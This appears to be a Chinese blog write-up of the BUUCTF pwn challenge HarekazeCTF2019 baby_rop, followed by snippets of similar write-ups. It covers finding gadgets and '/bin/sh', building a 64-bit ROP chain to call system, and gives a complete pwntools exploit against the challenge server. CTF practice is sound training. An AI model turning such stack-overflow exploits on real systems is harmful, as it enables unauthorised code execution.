[CTF]BUUCTF-PWN-[HarekazeCTF2019]baby_rop1

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量254 收藏
点赞数 1
分类专栏: PWN 文章标签: linux c语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53394081/article/details/130115459
版权
文章详细介绍了通过IDA分析程序,查找特定字符串和gadget,构建ROP链来调用system函数,从而获得shell的过程。在解决挑战时,注意到flag文件位于特定路径,需使用Linux命令进行访问。最终,利用Python的pwn库发送payload并交互获取目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

程序分析

  • 先看ida,程序较为简单在这里插入图片描述

  • 通过shift+f12搜索字符串,可以看到存在/bin/sh字符串,一个简单的rop
    在这里插入图片描述

解题思路

  • 利用gadget,pop rdi ret传入字符串并调用system,得到shell

  • 利用

    ROPgadget --binary 'baby_rop' --only "pop|ret"

  • 注意,打通了之后并不能直接cat flag,因为它在/home/babyrop里面,所以利用linux一些基本小命令得以打通在这里插入图片描述

exp

from pwn import*

p = remote('node4.buuoj.cn',29302)

sys_addr = 0x400490
bin_sh = 0x601048
pop_rdi = 0x400683

p.recvuntil('?')
p.sendline(b'a'*0x18 + p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))

p.interactive()
buuctf|[HarekazeCTF2019]baby_rop 1
m0_64236521的博客
05-02 1324
buuctf|[HarekazeCTF2019]baby_rop 1 分析 下载文件重命名为pwn_15,checksec一下 只开启了NX,64位,用ida看看 这里可以栈溢出,同时在侧面看到了system() shift+F12查看字符串 找到binsh,由于是64位,我们要寄存器传参,ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x
BUUCTF [HarekazeCTF2019]baby_rop2
最新发布
2401_88087539的博客
02-02 448
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 839
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
BUUCTF [HarekazeCTF2019]baby_rop
qq_51821131的博客
07-28 221
简单rop 分析程序 存在栈溢出 存在字符串binsh 找到返回地址 代码如图,由于是64位,先通过寄存器传参,所以利用pop|ret 打通后发现flag文件不在根目录 从而利用find -name flag,找到flag在/home/babyrop/flag中,cat一下即可 ...
[HarekazeCTF2019]baby_rop[BUUCTF]
moonlightsunshin的博客
05-05 456
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1776
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1547
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 897
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 498
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
[HarekazeCTF2019]baby_rop
、moddemod
06-12 439
exp from pwn import * context(log_level = 'debug') proc_name = './babyrop' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 25587) pop_rdi_ret = 0x400683 bin_sh_str = 0x601048 system_addr = elf.sym['system'] payload = 'a'.en...
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 381
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2704
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 1908
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
HarekazeCTF2019_baby_rop
z1r0的博客
12-04 775
HarekazeCTF2019_baby_rop 查看保护 溢出,有system和bin,rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 443
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
PWN——Buuoj [HarekazeCTF2019]baby_rop
u014377094的博客
01-21 782
先用IDA64打开,发现scanf看一眼存入数据的位置 熟悉的味道 按一下shift f12 system函数和/bin/sh都给了那就不客气了 困难题我唯唯诺诺,简单题我重拳出击 思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里 这个时候用到了ROPgadget 里面的babyrop是这道题的文件名,其他题换一下就ok 现在找到了地址,准备工作完成,敲python 有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值